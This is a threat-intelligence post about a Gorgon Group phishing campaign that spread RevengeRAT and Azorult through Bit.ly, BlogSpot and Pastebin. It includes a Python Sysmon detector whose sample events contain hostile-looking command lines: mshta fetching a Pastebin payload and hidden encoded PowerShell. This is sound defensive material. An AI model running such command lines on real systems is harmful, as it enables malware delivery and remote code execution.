Pastebin, BlogSpot, and Bit.ly Used to Spread RevengeRAT and Azorult, Again

Delaware, USA – October 3, 2019 – The campaign lasted at least until the end of September, and researchers associate it with the activities of the Gorgon Group. The Prevailion team found a financially motivated campaign, which began last year and uses legitimate resources both to infect victims with Azorult or RevengeRAT malware and for command-and-control communications, hiding the malicious activity from traffic analysis solutions. Researchers called the campaign MasterMana Botnet and liken it to a large-scale campaign distributing RevengeRAT malware conducted in March 2019. Based on the analysis of tactics, techniques, and procedures, the main suspect in these campaigns is the Pakistani threat actor ‘Gorgon Group’. Attackers send phishing emails with malicious MS Office documents to corporate email addresses. The document contains a VBS script that reaches out to a Bit.ly link, retrieving and decoding JavaScript from the attackers’ BlogSpot page. The downloaded script launches mshta.exe to open a next-stage payload hosted on Pastebin.

Over the ten months of the campaign, attackers repeatedly changed not only the Pastebin, BlogSpot, and Bit.ly links but also the malware delivered: in part of the attacks they infected victims with Azorult instead of RevengeRAT. Azorult can be used to deliver various tools and other malware, including ransomware.
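As an added example (not code from the article or from the SOC Prime rules it links), the following Python walks Sysmon process-creation records and flags the stages of the chain described above: an Office application spawning a script host, mshta.exe launched from that script host, mshta.exe spawning a shell, and a script host pulling content from Pastebin, BlogSpot or Bit.ly. The sample events and the PLACEHOLDER values are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon Event ID 1 (process creation) samples for this example, not
# campaign telemetry; PLACEHOLDER stands in for values the article does not give.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "mshta.exe https://pastebin.com/raw/PLACEHOLDER"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -enc PLACEHOLDER"},
    {"Image": r"C:\Windows\System32\mshta.exe",  # benign: local HTA opened from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Tools\helpdesk.hta"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
# Legitimate services the campaign abused for payload staging and C2.
STAGING_SERVICES = re.compile(r"pastebin\.com|blogspot\.com|bit\.ly", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for case-insensitive matching."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the name of every rule a process-creation event matches."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"]
    hits: List[str] = []
    if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
        hits.append("office_spawning_script_host")             # document running VBS
    if image == "mshta.exe" and parent in OFFICE_APPS + SCRIPT_HOSTS:
        hits.append("mshta_spawned_by_office_or_script_host")  # VBS launching mshta
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawning_windows_shell")            # HTA payload running a shell
    if image in ("mshta.exe",) + SCRIPT_HOSTS and STAGING_SERVICES.search(cmd):
        hits.append("script_host_fetching_from_paste_or_blog_service")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Pair each event index with every rule it triggered."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]
```

In production these checks would be fed from the Sysmon event log rather than an inline list, and the benign local-HTA case shows why parent process and command line, not the mshta.exe image alone, carry the signal.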
Content to uncover this attack is available on Threat Detection Marketplace:
MSHTA Spawning Windows Shell – https://tdm.socprime.com/tdm/info/2175/
Possible Malicious Use of MSHTA.EXE Detector (Sysmon Behavior) – https://tdm.socprime.com/tdm/info/2403/
MSHTA spawned by SVCHOST as seen in LethalHTA (Sysmon) – https://tdm.socprime.com/tdm/info/1065/
AZORult malware detected – https://tdm.socprime.com/tdm/info/2203/